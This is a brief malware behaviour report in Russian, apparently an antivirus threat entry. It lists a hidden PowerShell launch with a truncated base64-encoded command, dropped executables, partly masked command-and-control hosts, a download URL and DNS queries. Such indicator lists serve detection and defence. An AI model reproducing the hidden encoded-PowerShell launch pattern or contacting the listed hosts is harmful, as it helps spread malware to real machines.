Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABQAHIAdAB1AGQAYwB3AGIAYgBiAHkAPQAnAEwAaQBqAHMAcQBoAHYAbgB3AHcAdAB5ACcAOwAkAFcAcgBoAHYAdAB2AGcAYgBmAG4AeQBmACAAPQAgACcAMgAzADcAJwA7ACQARgB5AHkAdQBoAGsAdwB2AGw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 732
- %HOMEPATH%\237.exe
- %TEMP%\1303201.cvr
- %HOMEPATH%\237.exe
- 'oa######econtractors.com':80
- 'fi####recorp.com':443
- 'mb###ntures.biz':443
- http://www.oa######econtractors.com/0js9i/vOa20/
- 'fi####recorp.com':443
- 'mb###ntures.biz':443
- DNS ASK oa######econtractors.com
- DNS ASK ds####neroots.com
- DNS ASK fi####recorp.com
- DNS ASK mb###ntures.biz
- DNS ASK we###kicks.com